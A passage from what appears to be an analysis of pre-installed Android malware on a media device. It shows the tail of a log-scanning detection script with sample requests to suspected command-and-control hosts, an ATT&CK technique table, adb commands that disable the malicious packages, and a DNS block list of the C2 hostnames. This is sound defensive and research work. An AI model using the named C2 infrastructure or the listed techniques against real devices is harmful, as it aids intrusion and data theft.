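    '{"src":"10.0.0.21","scheme":"http","method":"POST","host":"store-api.aodintech.com","path":"/sign/app/list","headers":{"User-Agent":"okhttp/5.0.0-alpha.12","chanId":"HY260Pro_SpectraOS_TPYB"}}',
    '{"src":"10.0.0.21","scheme":"http","method":"POST","host":"event-api.aodintech.com","path":"/report","headers":{"User-Agent":"okhttp/5.0.0-alpha.12"}}',
    '{"src":"10.0.0.37","scheme":"https","method":"POST","host":"api.pixelpioneerss.com","path":"/aB3k9mP2s","headers":{"a":"1003"}}',
    '{"src":"10.0.0.5","scheme":"https","method":"GET","host":"www.example.com","path":"/index.html","headers":{"User-Agent":"Mozilla/5.0"}}',
]

if __name__ == "__main__":
    for src, hits in scan(SAMPLE_LOG).items():
        print(src, "->", ", ".join(hits))
```

A host matching only `c2-host` on ota.triplesai.com may be legitimate firmware checking, so treat the header and random-path indicators as the high-confidence ones and the hostname list as the blocking list.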
| Technique | ID | Proof |
|---|---|---|
| Supply Chain Compromise | T1195.002 | Malware factory pre-installed |
| Boot or Logon Autostart Execution | T1547 | BootReceiver Priority 999 |
| Obfuscated Files or Information | T1027 | XOR Strings, DEX Packing |
| Application Layer Protocol | T1071 | HTTP/HTTPS C2 |
| Dynamic Data Exchange / Payload Injection | T1055 | DexClassLoader, chmod 777 |
| System Information Discovery | T1082 | Device Fingerprinting |
| Data from Local System | T1005 | MAC, Serial, IMEI |
| Exfiltration Over C2 Channel | T1041 | Periodic Telemetry |
| Masquerading | T1036 | .bpp file extension, ADT-3 Spoofing |
| Rootkit | T1014 | Hidden su Binary |
```shell
adb shell pm disable-user --user 0 com.hotack.silentsdk
adb shell pm disable-user --user 0 com.htc.storeos
adb shell pm disable-user --user 0 com.htc.eventuploadservice
adb shell pm disable-user --user 0 com.htc.expandsdk
adb shell pm disable-user --user 0 com.htc.htcotaupdate
```

DNS blocking or firewall rules for:

```text
store-api.aodintech.com
cdn-store.aodintech.com
event-api.aodintech.com
pb-api.aodintech.com
api.pixelpioneerss.com
ota.triplesai.com
```
- Zane St. John: "Reverse-Engineering Pre-installed Android Malware with Claude Code", January 2026. https://zanestjohn.com/blog/reing-with-claude-code
- BSI: "BSI warns against pre-installed malware on IoT devices" (BADBOX), October 2023.
- VirusTotal analysis of the StoreOS APK.